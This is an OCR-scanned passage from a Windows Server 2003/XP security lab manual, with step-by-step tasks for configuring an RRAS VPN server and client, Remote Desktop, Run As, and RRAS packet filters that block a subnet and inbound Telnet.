- NEth Interfaces 22 y0aN Miipart (PRTR) (VPN4-98) VPN RaSFouting  Inactive
% " Clients (0) '@WAN Minipart (PPTP) (WPN4-97)  WPN RAS/Routing Inactive
0g I::;:in ceess Llents 22 y0aN Mniport (PRTR) (VPN4-96) VPN RASRouting  Inactive
T E Generga\ '@WAN Minipart (PPTP) (WPN4-95) VPR RAS/Routing Inactive
E Static Routes @WAN Miniport (PPTP) (WPN4-94)  WPR RASjRouting Inactive
E DHCF Relay Agent @WAN Miniport (PPTP) (WPN4-93)  WPR RAS/Routing Inactive
E 15MP @WAN Miniport (PPTP) (WPN4-92)  WPR RAS/Routing Inactive
=57 Remote Access Foiicies 2 ywan Miniport (PPTF) (VPN4-91) VPN RAS/Routng  Inactive
-] Remaote Access Logging @WAN Miniport (PPTP) (WPN4-90)  WPR RAS/Routing Inactive
T WAN Mniport (PRTR) (WPN4-9)  WRN RASjRoutng  Inactive
@WAN Miniport (PPTR) (WPN4-59)  WPR RAS/Routing Inactive
@WAN Miniport (PPTP) (WPN4-85)  WPM RAS/Routing Inactive
WA Miniport (PPTR) (WPN4-57) WP RAS/Routing Inactive
?WAN Miniport (PPTP) (YPN4-86)  WPN RAS/Routing Inactive
?WAN Miniport (PPTP) (YPN4-85)  WPN RAS/Routing Inactive
WAN Miniport (PPTR) (WPN4-54)  WPN RAS/Routing Inactive
4 (| kil sl

9. Right-click on Ports and select Properties. Notice that by default, 128 PPTP ports and
128 L2TP ports are enabled. For performance and security reasons, you should reduce
these numbers to something closer to the number of concurrent VPN connections you
are expected to support.

2]
Devices
Fiouting and Remate Access [RRAS] uses the devices listed below.
Mame | Lsed By | Tupe | Num

WM Miriport FPPOE None PPPaE 1
PETF] "

iniport [L2TP) Routing L2TP
Direct Parallel Rauting Parallel

LCaonfigure...

Ok I Cancel | Apply |

10. Select WAN Miniport (PPTP) and click Configure to open the Configure Device
dialog box.
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1.

12.
13.

14.
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Configure Device - WAN Miniport (PPTP)

You can wse this device for remole access requests or demand-dial

connections

¥ Bemote access connections (inbound only]

¥ Demand-dial rauting connections (inbound and outhaound)

I Demand-dialrouting connections [authound anly]

PBhone number for this device:

Mazimum poits: 1 _Ij

—

You can set a maximum part limit for & device that supports multiple ports.

Cancel

You will be returning to this console in the following task, “Configuring the

VPN Client.”

Granting the Dial-in Privilege to Users

1.

Reduce the Maximum Ports value to 10 and click OK. You will receive a warning
message about possibly disconnecting active sessions. Click Yes to continue.

Select WAN Miniport (L2TP) and click Configure.

Reduce the Maximum Ports value to 10 and click OK. You will receive a warning
message about possibly disconnecting active sessions. Click Yes to continue.

Minimize the RRAS console.

Select Start » Programs » Administration Tools » Active Directory Users And
Computers (ADUC).

Expand the domain. Select the Users container.

In the right pane, select the Administrator account. Right-click the Administrator
account and select Properties.

[
£ Acti rectory Users and Computers [_ 1Ol =]
<3 Fle  Action Yiew Window Help ‘ ==
e~ B L BXEFIB 2 eBEBTaR
@ Active Directory Users and Computer | Users 32 abjects
(] saved Queries Name_ % [ Type [ Description ]
& @ [rgb;el"t‘.com E-WINS Users Security Group .. Members who have view-only access b,
uiltin ]
Copy...
(gl cLIEnTs mTelnetCIients Security Graup have access to ..
(Z Computers Add ko a group. ..
: P SUPPORT 38894550 Liser unt For the Help ..
{8 Confidential Cliznts b P oty G Mame Mappings. ..
&) Confidential Servers o ervice Admins SEUrly BrEUR - picable Account |
{&] Domain Controlers Schema Admins Security Group Reset Password... tors of the schems
[ FareignSecurityPrincipals € root User Move...
{&] Hardened Servers mRAS and IAS Servers Security Group Qp;n Home Page &N access remat., |
[ LostAndFound $akebrat User o] r Siervice Account
(Z1 NTDS Quotas ﬁ IWAM_RIO User = ernet Infarmatio. .
(2 Program Data € 1wAM_EOBO User All Tasks P ternet Informatio..
(1 System % 1UsR_RIO User a onymous access ..
423 Users % 1USR_BOB User . onymaus access .,
{48 widget Production 05 wes Serurity Groun o oup
mHe\pSerwcesGroup Security Group = " M Support Center
| | 5l Guest User Properties est access to the, | =
‘ K _— ¥
Help =
—_—
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You will remember that in Task 5.4, “Securing the Default User Accounts,”
you renamed the Administrator account and created a useless account
named Administrator to increase security for default accounts. The
account named TopDog in the preceding graphic is the administrator

for the domain. You would select (multiple-select with Shift-click or
Ctrl-click) the accounts that require VPN access and grant the dial-in
privilege, as necessary.

In production, it is generally not advisable to install the RRAS/VPN service
on a domain controller. Domain controllers are the foundation for the
security of the Active Directory environment and remote connectivity is
typically not enabled for these systems. In your configuration, if the VPN
server is configured on a domain controller, additional privilege must be
granted to any nonadministrator VPN users. Nonadministrator users are
not allowed to log on to a domain controller by default. Nonadministrator

users would need to be granted the right to log on locally to the domain
controller/VPN server.

Select the Dial-in tab of the user account Properties dialog box. Select Allow Access in
the Remote Access Permission (Dial-in Or VPN) section.

TopDog Properties ﬂ m

Enwronmenll Sesswonsl Remote contlo\l Teminal Services Frohlel COM+
General I Addiess | Account | Piofile | Telephones | Organization
Published Certificates I Member OF Diakin I Object I Security

r— Flemote Access Permission [Diakin or YPH]

" Deny access

" Control access thiough Remote Access Policy
™ Werity Caller-|D: |
— Callback Optior:

& Mo Callback
" Set by Caller [Fouting and Remate Access Service only]

 Always Callback to:
[~ Assign a Static IP Address . . .

1 Apply Static Boutes

Defing routes to enable for this Dialin Gatic Foutes |
connection —

0F. I Cancel | Apply |

Click OK to close the user Properties dialog box. Close ADUC.
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Criteria for Completion

You have completed this task when you have initialized and configured RRAS for 10 PPTP
ports and 10 L2TP ports, then granted the dial-in privilege to the appropriate VPN user
accounts in ADUC.

Task 6.3: Configuring the VPN Client

In Task 6.2, you initialized and configured the VPN server. The server would be connected
to the corporate LAN, behind a firewall. The firewall, actually the Network Address
Translation (NAT) server component of the firewall, would be configured to forward all
inbound VPN connections to the internal VPN server.

No server service is useful until it has clients. That goes for VPN servers as well.

Scenario

You are the administrator of a Microsoft Windows Active Directory environment and
have workers who telecommute. You must configure the client systems to access resources
securely over the Internet.

This task requires the completion of Task 6.2, “Configuring the VPN Server.”

Scope of Task

Duration
This task should take 20 minutes.

Setup
You will configure the client side of the VPN.

Caveat

The encryption process demands large numbers of CPU clock cycles. This will cause noticeable
degradation in the performance of both the VPN server and the VPN client systems.

Procedure

For this task, you will configure the VPN client to connect to the VPN server you configured
in Task 6.2. You will then confirm the connection on the VPN server.

Equipment Used

For this task, you must have:

s Windows XP Professional system
= Administrator access

= Connectivity to the VPN server configured in Task 6.2
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Details

Configuring the VPN Client

1. Log on to the Windows XP Professional system as the Administrator.

2. Select Start » Programs » Accessories » Communications » New Connection Wizard.
3. Click Next on the first page of the New Connection Wizard.
4

Select Connect To The Network At My Workplace. Notice the reference to the VPN
in the description. Click Next.

New Connection Wizard
Metwork Connection Type
Wwhat do you want to do?

" Connect to the Intemet

Connect to the Intemet o pou can browse the 'web and read email

{* Connect to the network at my workplace
Connect to a business network [using diakup or YPHN) s0 vou can wark from home,
4 field office, or another location,

" Sgt up an advanced connection

Connect directly ta anather computer using your serial, parallel. or infrared port, or
set up thiz computer sa that other computers can connect ba it

< Back I Mexst > I Cancel |

5. On the Network Connection screen, select Virtual Private Network Connection and
click Next.

New Connection Wizard

Network Connection
How do you want to connect to the netwark at your workplace?

Create the following connection:

" Dialup connection
Connect uzing a modem and a regular phone line or an Integrated Services Digital
Metwork [|1SDM] phone line.

% Virtual Private Network connection

Connect to the network using a virtual private network, [WPN] connection over the
Intermet.

< Back | Mext > | Cancel |

6. On the Connection Name screen, type the description VPN for your VPN connection.
Click Next.

7. On the VPN Server Selection screen, type the name or IP address for your VPN server.
Click Next.

8. On the Connection Availability screen, select My Use Only as the Create This
Connection For option. Click Next.
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New Connection Wizard

Connection Availability
“V'ou can make the new connection avalable to any user or only to yoursell

A connection that is created for your use only is saved in pour user account and is not
available unless you are logged on.

Create this connection for:
 Anpone's use

1 My usze only

< Back I Mext > I Cancel |

9. On the Completing The New Connection Wizard screen, select the check box to add a
shortcut to your desktop and click Finish to complete the wizard.

10. Launch the VPN connection from the desktop icon. Select Properties and then select
the Networking tab.

11. From the Type Of VPN drop-down on the Networking tab, select PPTP VPN. Click
OK to close the Properties dialog box.

Generall Dpliuns' Secuity  Metworking IAdvancedI
Type of ¥PH
IAulomatlc d

FRTP VPN
LETP IPSec VPN

Thiz connection uzes the fallowing items:

b g
W] 5= Intemnet Protocal [TCPAR,
.[5 QoS Packet Scheduler
g File and Printer Sharing for Microsoft Metworks

)

=1 tware Bridgs Pratacal =
Irstall Uninstal Froperties |
r~ Description

Metmaon Packet capture driver that allows the Netmon Ul ta
acquire packets from the local network:

Cancel |

Connecting the VPN Client to the VPN Server

1. In the Connect VPN dialog box, type the name of the account you granted dial-in
permissions to in Task 6.2.

Type the password for this account.

Select Me Only for the option Save This User Name And Password For The Following
Users.
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comectvy 21

User name: ITUDDUQ

Password |uuuuu

[¥ Save this user hame and password for the following Lsers

' Me only

{7 Bryone whouses this computer

Cannect I Cancel | Properties | Help |

4. Click Connect. You should see a dialog box that details the process of the authentication
and then the registration of your computer on the (remote) network.

5. You are now connected to the VPN server. All communications between this client
system and the VPN server system are encrypted.

Confirming the VPN Connection
1. Log on to the VPN server as the Administrator.

2. If it’s not already running, launch RRAS by selecting Start » Programs » Administration
Tools » Routing And Remote Access.

Expand server_name (local) as necessary. Select Ports.

In the right pane, click once or twice on the column title Status to see the active
connection on the PPTP port.

2 Rowting andRemotepceess
Fil=  Action ¥iew Help
oo ERRIe
E Routing and Remote Access Ports
i) Server Status Name | Device | Used B Status 4 | =
F 3 RIO (local) | 5 WA Miniport (FPTF) (VENA-9)  WPH RAS[Routing  Active
& metwork Interfaces 2N Miriport (PPTP) (WPN4-2)  YPN RAS/RoUtng  Inactive
% E::fta Access Clients (1) 2 AN Miniport (PPTP) (WPN4-3)  WPH RAS/Routing  Inackive
E IP Routing I@WF\N Miniport (PPTPY (WPM4-4)  WPN RAS/Rauting Inactive
E seneral %WF\N Miniport {PPTP) (WPN4-5)  WPN RAS/Routing Inackive
E Static Routes @WAN Miniport {PPTRY (WPN4-8)  WPH RAS5/Routing Inactive
E DHCF Relay Agent ﬁWF\N Miniport (PPTP) (YPH4-7)  WPM RAS/Routing Inactive
E 1GMP '@WF\N Miniport {PPTR) (WPN4-8)  WPN RAS[Routing Inackive
] % Remate Access Polides '@wnw Miniport {LZTF) (WPN3-0)  WPM RAS[Routing Inactive
D Remote Access Logging 'gWF\N Miniport (L2TP) (¥PN3-11  WPH RAS/Routing Inackive
Wial Miniport (LZTR) (WPN3-2) WP RAS[Routing Inackive
I@WF\N Miniport (L2TP) (WPN3-3)  WPN RAS/Rauting Inactive
%WF\N Miniport (L2TP) (YPN3-4)  WPH RAS/Routing Inactive
@wnw Miniport {LZTP) (WPN3-5)  WPH RAS/Routing Inactive
ﬁWF\N Minipork (L2TP) (WPN3-6)  WPM RAS/Routing Inactive b
'@WF\N Miniport {LZTP) (YPN3-7)  WPN RAS[Routing Inackive
'@wnw Miniport {(PPPOEY (PPPO...  FPPOE Fouting Inactive
J | S ey e wme e
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5. In the left pane, notice that there is currently one Remote Access Client. Select Remote
Access Clients in the left pane.

6. You should see your inbound VPN connection in the right pane. Right-click on the
VPN client connection in the right pane and select Disconnect.

¢ Routing and Remole Aderis 1O x}
Ol Actien  Yew Lo

e« LE DE 2

Rgmnte Access Chents (1)

a2 Bamote Access Chants (1)

Pans

Notice that you can disconnect this VPN client or send the client
TE a message.

Criteria for Completion

You have completed this task when you have configured a VPN client and successfully
connected to the VPN server, then confirmed the connection by viewing the Ports and
Remote Access Clients properties of the RRAS/VPN server.

Task 6.4: Implementing Secure
Remote Administration

It has become routine practice to perform administrative tasks from the comfort of your
own office, rather than sitting in the cold, cluttered, noisy server room. This is made
possible by remote administration tools, and one of the most prevalent is the Remote
Desktop Protocol (RDP).

RDP is an extension of Terminal Services (TS). It allows for a maximum of two
inbound connections for administrative purposes. Terminal Services limits the number
of inbound connections by the number of client access licenses you purchase
and activate.
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RDP uses the same port as TS, port 3389, and is automatically encrypted using
128-bit RC4. This can be further strengthened by implementing the newer RDP over SSL.
RDP over SSL still uses port 3389 and requires a digital certificate on the TS server. For
even stronger security, you can implement mutual authentication by requiring a digital
certificate on the TS client as well.

RDP has been available as long ago as Windows NT 4 and can be used on both server
and client operating systems.

Scenario

You are the administrator of a Microsoft Windows environment and need to perform
administrative tasks on remote XP Professional computers.

Scope of Task

Duration
This task should take 30 minutes.

Setup

Remote Desktop must be enabled on the target remote system. This system will be the
RDP server.

There are several considerations regarding the status and configuration of the user
account that will be performing the remote administration. The client system must be
configured correctly to implement the RDP connection to the RDP server.

Caveat

RDP access to a system is a fine thing for an administrator who doesn’t have physical
access to a system, or who prefers to work in the comfort of their own office instead of the
server room. It is also a fine thing for an attacker. This is the attacker’s remote doorway
into your systems. Allowing RDP connections to any system increases the vulnerability

of those systems and should be carefully considered prior to implementation.

Procedure

You must configure the target XP Professional system to allow for remote administration.
Once enabled, members of the Local Administrators group (or Domain Administrators

group if the system is a domain member) already have Remote Administration access. If the

remote administration account is not an administrator, their account must be added to

the local Remote Desktop Users group.
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In addition, every remote administration user account must have a password
(the password cannot be blank) in order for RDP to allow the connection.

Finally, you must configure the RDP client to make the connection to the target
RDP server.

Equipment Used

For this task, you must have:

= Windows XP Professional system

s Windows XP Professional or Server 2003 system (target system)

s Administrator access

Details

Configuring the RDP Server

1. Log on to the Windows XP Professional or Server 2003 target system as the
Administrator. This system will be the RDP server.

2. Right-click on My Computer and select Properties. (You can find My Computer in the
Control Panel as well by selecting the System applet.)

3. Select the Remote tab.

System Properties 2lx
General | Computer Marme I Hardware | Advanced |
System Festore | Automatic Updates Remote:

"‘j-F- Select the ways that this computer can be used from anather
location.

- Remote Assistance

v Allow Remate Assistance invitations to be sent from this computer

Advanced

wihat is Remate Assistance?

~ Remate Deskiop
¥ Allow users to connect remately to this computer
Full compiter name;
shatgun. mobeer. com

‘w/hat is Remote Desktop?

Select Remote Users. .

Far uzers to connect remately ta this computer., the user account must
have a password.

‘Windows Firswall will be configured to allow Remate Desklap
connections to this computer.

ak. I Cancel | Apply |

4. In the Remote Desktop section, enable the Allow Users To Connect Remotely To This
Computer check box.
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Notice the statement regarding the password requirement for remote
TE users.

5. Click the Select Remote Users button. The resulting dialog box is where you would add
nonadministrator user accounts to enable them for remote administration purposes on
this target RDP server.

Remote Desktop Users 21Xl

The users listed below can connect to this computer, and any members of
the Administrators group can connect even if they are not listed.

MOBEER\TopDog akeady has access,

| Add.. I Remove |

Ta create new user accounts of add users to other groups. go ta Contral

Panel and open User Accounts.
OK I Cancel

)’ Notice the statement regarding members of the Administrators
AéTE group already having access through RDP. Since you will be using an
Administrator account to perform the remote administration, you do not
need to add any accounts to this dialog box.

6. In the Remote Desktop Users dialog box, click Cancel. Click OK to close the System
Properties dialog box.

Configuring the RDP Client

1. Log on to the Windows XP Professional system you will use for remote administration
as the Administrator. This system is not the target system and will be the RDP client.

2. Select Start » Programs » Accessories » Communications » Remote Desktop
Connection.

3. Select the Display tab. This is where you configure the display quality.

)’ Increasing the display quality could degrade the performance of the
;&TE RDP connection. Decreasing the number of colors typically provides the
greatest improvement on the performance of the RDP connection.
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“.‘.‘ Remote Desktop Connection

General  Display lLu:aI Resources | Piograms | Expesience | Securty |
-~ Remote desktop size

i Choose the size of your remote deskiop. Drag the sider al the
way to the right to go fullscreen.

Less B —— ) More
Full Sereen
i~ Colors
| High Color (16 bit |
N .

Mote: Settings on the remote computer might ovemids this setting,

¥ Display the connection bar when in full screen mode

Cancel I Help I thims«]

4. Select the Local Resources tab. This is where you connect your local resources (sound,
keyboard, and local devices) to the remote system inside the RDP session.

Genetall Display  Local Resources |ngams| Expen'enoel Ser.urily|

~ Remote computer sound

-
@E IEling to this computer l]

o

[ Keyboard
w2 Apply Windows key combinations:
@ (for example ALT+TAR]

Iln full screen mode only ﬂ

i~ Local devices
= Connect automatically to these local devices when logaed on
P to the remote computer.

F# Disk diives
¥ Piirters
I~ Seiial poits

| Connect I Cancel I Help I thims«]

5. Enable the Disk Drives check box in the Local Devices section of the Local
Resources tab.
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2 You should connect your local drives to the remote system only if you trust
ING the remote system. This connection could provide access for the transfer
of viruses or other malware between the two systems.

The Programs tab is used to configure an application to launch
TE automatically when the RDP connection is initialized. This tab could be
used to launch administrative tools (such as the backup utility) on the

remote system, for example.

6. Select the Experience tab. From the drop-down list, select the appropriate connection
type that exists between the RDP client and the RDP server.

Selecting a connection type that exceeds the actual connection
TE performance may degrade the performance of the RDP session.

|
99 Remote Desktop Connection |- [O] x|

General | Display | Local Resources | Programs  Expetience lSemrit_vl

- Perfoimance

Q’) Choose your connection speed to optimize performance.

s or higher]

Allow the following:

¥ Desktop background

¥ Show contertts of window while dragging
v Menu and windaw animation

¥ Themes

¥ Bitmap caching

[¥ Reconnect if connection is dropped

| Cannect I Cancel | Help [ Options << |

7. Select the Security tab. This is where you would configure the SSL component if you
had implemented it correctly on the RDP server. Since this was not configured in this
task, select No Authentication in the Authentication drop-down list.
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% Remote Desktop Connection

General | Display | Local Resources | Pragrams | Experience  Security

~ Security
It Authentication will confim the identity of the remote computer to
3 which you connect.

If vou enable authentication you may need to type a fully
qualiied domain name [FODN) in the Computer figld on the
General tab of the Remote Desktop Connection dialog box. An
example of an FODM:

sxample. microsoft.com

Authentication:

| Mo authentication

|
Attempt authentication
Requite authentication

| Cannect I Cancel I Help I Options <<

Implementing authentication would require a digital certificate on the
TE RDP server and could be strengthened further by implementing a digital
certificate on the RDP client as well.

8. Select the General tab.

92 Remote Desktop Connection

General |Display| Local Resources | Programs | Experience | Secuity |

~ Logon settings
[=] Type the name of the computer, or choose a computer fram
— the drop-dovin list.
Computer: Ishotgun mobest.cam j

User name: ITopDc-g

Passward: |O.no..l..o

Dornair: |mobeel.:om

[V Save my password

- Connection settings
Save current setlings, or open saved connection.

Hep | Defions < |
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Complete this tab as follows:
s Computer: Type the name of the RDP server.

s User Name: Type the name of the administrative account you plan to use for the
RDP session.

s Password: Type the password for the administrative account you plan to use for
the RDP session.

= Domain: Type the domain name that the RDP server and client are members of. If
they are not members of a domain, leave this field blank.

= Enable the Save My Password check box.

Click the Save As button to record your settings. Save the RDP client configuration to
the desktop and assign it the name RDP_Server.rdp, where RDP_Server is the name of
your own RDP server.

Save As HE
Save in: @Desktop j QT o

|3y Dacuments
WRID  MOBEER.COM
'\Q Iy Metwork Places
[CMISC

|7 ADMIN TOOLS

My Documents

3

RID
MOBEER.COM

File name: SHOTGUN.RDP = Save I
Remote Deskiop Files [ ROF] Cancel

7

Save as lype:

Launching the RDP Connection

1.
2.

On the General tab of the Remote Desktop Connection dialog box, click Connect.
You should receive a warning regarding the risks associated with connecting your local
disk drives to the remote system. Click OK to clear the warning message.

You should now be presented with a session on the remote system, the RDP server. You
are logged on locally to this system and are functioning as if you were sitting at the
local console of the remote system.

You can use the controls at the top of the window to display or minimize the RDP
session.

From here you can now run any applications and/or administrative utilities
TE on the remote system.
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5. Click the Start button and select to disconnect the RDP client.

6. Confirm the disconnection to close the RDP session.

Criteria for Completion

You have completed this task when you have configured the RDP server and the desired
user account for the remote administration. You must also have configured the RDP client
and initiated, then terminated, the RDP session.

Task 6.5: Secure Administration
Using Run As

A fundamental concept behind most operating systems is that a single user should have
only a single user account, and that all functions that user is required to perform should
be accomplished from that single user account. This is true for all users except the
administrators of the network.

Administrators of the network should have two user accounts: one user account with
Administrator privileges, and one user account with nonadministrator privileges.

The highest levels of administrators, which should be a rare few individuals,
TE would have a third account: access to the Administrator account for the

domain.This is the default, built-in Administrator account that cannot be

locked out on domain controllers and that cannot be deleted. This account

should be utilized only in extreme emergencies where an administrator

(a user account that has been added to the Domain Administrators global

group in a domain, or the local Administrators group in a workgroup)

account is unavailable or doesn’t have sufficient privileges to accomplish

a given task.

The nonadministrator account is the one that you should use to log on to any system,
every time. This is your daily-use account. This account cannot accomplish administrative
tasks.

In order for you to perform your administrative functions, while logged in as the
nonadministrator, you right-click on the desired administrative tool and select Run As from
the menu. You are prompted for credentials. Enter your Administrator credentials, which
launches the administrative utility with the elevated Administrator privilege.

This procedure keeps the desktop and all processes running at a nonadministrator level
of privilege, and invokes the Administrator privilege only when it is required to perform
administrative tasks.
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The Run As function relies on the Secondary Logon service. This service must be
running on the system where the second set of credentials will be utilized. If the Run
As function fails, confirm that this service is running. If the Secondary Logon service
is running and the Run As attempt fails, it is usually a good idea to stop and restart the
service (this is referred to as bouncing a service).

You can find more information on the Run As function at http://www
TE .microsoft.com/resources/documentation/windows/xp/all/proddocs/

en-us/runas.mspx?mfr=true.

Scenario

You are the administrator of a Microsoft Windows environment and need to perform daily
administrative tasks as securely as possible.

Scope of Task

Duration
This task should take 30 minutes.

Setup

There is no setup for this task.

Caveat

By logging in as a nonadministrator user and using the Run As function, you are securing
all of the desktop processes to a standard user level of privilege. Doing so limits the
potential extent of compromise if an attacker is able to hack into your system through these
processes.

However, any applications you launch with elevated privilege may be the compromised
process. The processes launched with elevated privileges should be terminated as soon as
the administrative task is complete to minimize the potential exposure to an attacker. In
other words, don’t launch the tool with elevated privileges and leave it running overnight,
or even for the day. Kill the process as soon as possible, and launch it a second time if and
when it is needed.

Procedure

You must create a nonadministrator user account intended for routine, daily use. You will
then confirm that the secondary logon service is available and responsive.
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You will log on via the nonadministrator account and attempt to launch an administrative
tool to confirm the Access Denied response to the nonadministrator user. Then you’ll launch
the administrative tool using the Run As function, entering Administrator-level credentials.
This time the administrative tool will launch, with the elevated privilege of the administrator
credentials you’ve provided.

Finally, you’ll explore the Run As function from the command line. Command-line tools
are useful when scripting administrative functions. This command line can be written in a
batch file for repeat use or to be launched after hours in a scheduled task.

Equipment Used
For this task, you must have:
= Windows XP Professional system

s Administrator access

Details
Creating the Nonadministrator User
1. Log on to the Windows XP Professional system as the Administrator.

2. Right-click on My Computer and select Manage. Or you can select Start » Programs »
Administrative Tools » Computer Management to open the same console.

Expand Local Users And Groups. In the left pane, select the Users folder.
Right-click on the Users folder and select New User.

Complete the New User dialog box as follows:

= User Name: BoBo

= Full Name: BoBo

s Description: Non-administrative User

= Enter a password twice.

s Clear the User Must Change Password At Next Logon check box.

= Enable the Password Never Expires check box.

6. Click Create to create the user account. Click Close to close the New User
dialog box.

Confirming the Secondary Logon Service
1. In the Computer Management console, expand Services And Applications.

2. In the left pane, select Services. In the right pane, scroll down to view the Secondary
Logon service.
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TE started.

Right-click on the Secondary Logon service and select Restart.
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As we mentioned earlier, this is called bouncing the service, and it

TE confirms that the service is alive and should be responsive.

A Service Control dialog box opens that shows the progress of the restart process.

Close the Computer Management console. Log off as Administrator.
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Administrative Activities When Logged On as a Nonadministrator User

1. Log on to the Windows XP Professional system as BoBo, the nonadministrator user.
2. From the Start button, select Control Panel.

3. In the left pane, select Switch To Classic View.
4

Double-click the System applet. In the System Properties dialog box, select the
Hardware tab. Click the Device Manager button.

System Properties C]E]
System Restore Automatic Updates Remote
General Computer Name | Hardware | Advanced

Device Manager

- The Device Manager ists 2l the hardware devices installed
= on your computer. Use the Device Manager to chanae the
properties of any device.

Drivers

@ Diiver Signing lets you make swie that installed divers are
compatible with ‘W/indows. Windows Update lsts you set up
how Windaws connects to Windows Update for drivers.

[ Driver Signing ] I ‘windows Update

Hardware Profiles

Hardware profiles provide a way for you to set up and store
different hardware configurations.

Hardware Profiles

5. You should receive a Device Manager warning message regarding insufficient security
privileges. Clear the warning message.

% This is evidence of the use of the nonadministrator user account.
TE

6. In Device Manager, expand the Display Adapters. Right-click on the adapter and select
Properties. Select the Driver tab.

Notice that other than viewing information about the display adapter
TE driver, you cannot make any configuration changes.
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§3 Graphics ProSavageDDR Properties

Genelal‘ Driver |Datai\s Resources

% 53 Graphics PioSavageDDR
Driver Provider. 53 Graphics Co., Lid
Driver Date: 3/2/2004
Driver Yersion: 6141025
Digital Signer: Microsoft Windows Hardware Compatibility Publ
To view details about the driver files.
Update Driver
Roll Back Driver
Uniristall
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Click Cancel to close the Properties dialog box. Click the X in the upper-right corner

to close Device Manager. Click Cancel to close the System Properties dialog box.

In the Control Panel, press the Shift key on your keyboard while you right-click on the
System applet. Select Run As from the menu.

You should see a Run As credentials dialog box.

Run As f'5__<|

% Wwhich user account do you want ko use ka run this program?

O Current user (SHOTGUNBoBa)
Pratect my computer and data from unauthorized program activicy
This option can prevent computer viruses from harming your

compuker or personal data, but selecting it might cause the program
to Function improperky,

(%) The following ussr:

User name: | € SHOTGUN|TopDog v | foo

Password: | CITTIYTTTT ) |

Click the radio button for The Following User.

Enter the correct Administrator username and password. Click OK.

In the System Properties dialog box, select the Hardware tab. Click the Device

Manager button.
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13. In Device Manager, expand the Display Adapters. Right-click on the adapter and select
Properties. Select the Driver tab.

Notice that you can now make any configuration changes desired. This is
TE evidence of your elevated privilege level from your secondary logon using

Administrator credentials.

14. Click Cancel to close the Display Adapter Properties dialog box. Click the X in
the upper-right corner to close Device Manager. Click Cancel to close the System
Properties dialog box. Close the Control Panel.

Using the Command-Line RunAs

1. Still logged in as BoBo, from the Start button select Run. Type CMD and click OK.
In the command window, type runas /2.

View the resulting help information on the RunAs command.

At the command prompt, enter defrag.exe c: to launch Defrag.exe.

o w DN

You should receive a message stating the following:
You must have Administrator privileges to defragment a volume.

6. At the command prompt, enter runas /user:TopDog "defrag.exe c:" to launch defrag
.exe with the RunAs function.

% On this system, the Administrator account has been renamed to TopDog.
TE

The double quotes are necessary around defrag c: due to the space used
TE between defrag and c: in the command.

7. You should be prompted for the password for the administrator. Type the password
and press Enter. This should launch a command-line version of defrag.exe.

Criteria for Completion

You have completed this task when you have utilized the RunAs function to launch
applications with elevated privileges, in both the graphical user interface (GUI) and from
the command line.
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Task 6.6: Configuring a Packet Filter

Packet filters are a fundamental component of every router and firewall, and are built into
virtually every operating system. They primarily operate at Layer 3 of the Open Systems
Interconnection (OSI) model, but have functionality at both Layer 3 and Layer 4. They are
fast, easy to configure, and strong.

The downside of packet filters is that they are not very intelligent. Packet filters either
allow an IP/port combination or they block the IP/port combination. They are either wired
open or wired closed.

Most contemporary firewalls combine the packet filter (called a generation 1 firewall)
with a proxy service (called a generation 2 firewall) and a stateful inspection engine (called
a generation 3 firewall).

Scenario

You are the administrator of a Microsoft Windows environment and have been experiencing
unexpected and undesired traffic from a remote network. You also suspect that your server
has been probed in an attempt to execute a specific exploit. You must stop these activities
from affecting your network and your systems.

Scope of Task

Duration
This task should take 20 minutes.

Setup

The configuration of packet filters, in this case, will be performed on a Windows Server
2003 system that is also performing a routing function in your network. You will utilize
the Routing And Remote Access Services (RRAS) server to implement the packet filter.

Caveat

Implementing a packet filter to block undesirable traffic will also block desirable traffic that
matches the filter specifications.

Also, attacks come from many different locations, target many different systems on your
network, and can be implemented using any number of ports and/or protocols. The packet
filter is one of your tools to secure your environment, but it is certainly not going to be the
answer to all risks. You must implement many layers of security in addition to packet filters.

Procedure

You have noticed unsolicited, unexpected, and undesired traffic on your network
that is coming from a network where the IP address range of 192.168.10.1 through
192.168.10.254. You want to stop all of this traffic.
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You have also noticed many failed Telnet logon attempts on your server, and you must
block this inbound traffic as well.
You will implement two packet filters to eliminate this traffic from your network.

Equipment Used
For this task, you must have:
= Windows Server 2003 system running RRAS

= Administrator access

Details
Configuring the Packet Filter in RRAS
1. Log on to the Windows Server 2003 system as the Administrator.

2. From the Start button, select Programs » Administrative Tools » Routing And Remote
Access.

Expand server_name (Local). Expand IP Routing and select General.

In the right pane, select your Local Area Network Interface.

In the following graphic, this interface has been renamed with the IP
TE address bound to the interface: 192.168.222.200.
5. Right-click on the Local Area Network Interface and select Properties.

5 Routing and Remote Access |81 x|

File  Action View Help

0 BEXERE|2

E Routing and Remate Access General
H Server Status Interface © | Type | 1P Address | Administrative Status
Bl _RI_O (ocaly Loopback. Loopback 127.0.0.1 Up
2 Network Interfaces 2 Internal Irkernal 169.254,157.62 Up
-2 Remote Access Clients (0) | @ " Up
B ports ® Update Routes [ ™
== IP Routing
ﬂE General Show TCRSTP Information. ..
BT Static Routes Show Address Translations. ..
T DHCP Relay Agent Show IP Addresses, ..
LB IGMP Show IP Routing Table. ..
% Femote Access Policies Show TCP Connections. ..
[-{_] Remote Access Logging Shaw UDP Listener Parts. .,
Delete
Refresh
Properties
< | E1| Help |

|Show Address Translations | ‘

6. In the Properties dialog box, click the Inbound Filters button on the General tab.
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192.168.222.200 Properties d |

General IEnnfiguraIiDnI Multicast Enundaliesl tulticast Heallheall

IP Interface

[ Enable router discovery ;dverlisements
Advertisement lifetime [minutes] 30 _:I
Levelof preference: o _I;
Send aut advertisement within tis intenyal:
Hinimurm time (minutes]: 7 _|;

[ Egirmum time: [minutes]; 0 _:I

Inbaound Filters... Dutbound Filters...

[ Enable fragmentation checking

In the Inbound Filters dialog box, click New to add a new packet filter.
Your first objective is to block all traffic coming from the network 192.168.10.0.

Select the Source Network check box, and fill in the IP address 192.168.10.0. Fill in the
Subnet Mask value of 255.255.255.0. Leave the Protocol option set to Any.

¥ Source netwark

IF address: I 132 .168. 10 . 0
Subret mazk: I 255285255, 0

I Destination nehwork

IP address: I . . .
Subnet mask: I . . .

Protocal: IA,—,_.,. j

Cancel |

10. Click OK to close the Add IP Filter dialog box.

This packet filter will drop all packets from the IP address range of
A TE 192.168.10.0 through 192.168.10.255, going to any destination and using

any port or protocol.
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11. Your next objective is to block any inbound packets aiming at Telnet, which uses TCP

port 23.

12. In the Inbound Filters dialog box, click New to add a new packet filter.

13. Select the Destination check box, and fill in the IP address of this system: 192.168.222.200.
Fill in the Subnet Mask value of 255.255.255.255. Select TCP from the Protocol drop-
down list. Leave the Source Port option blank. Type 23 in the Destination Port field.

[~ Souce network
|P address: ]—
Subnet mask: ]—
[V Destination network
IP zddress: [132 188 222 200
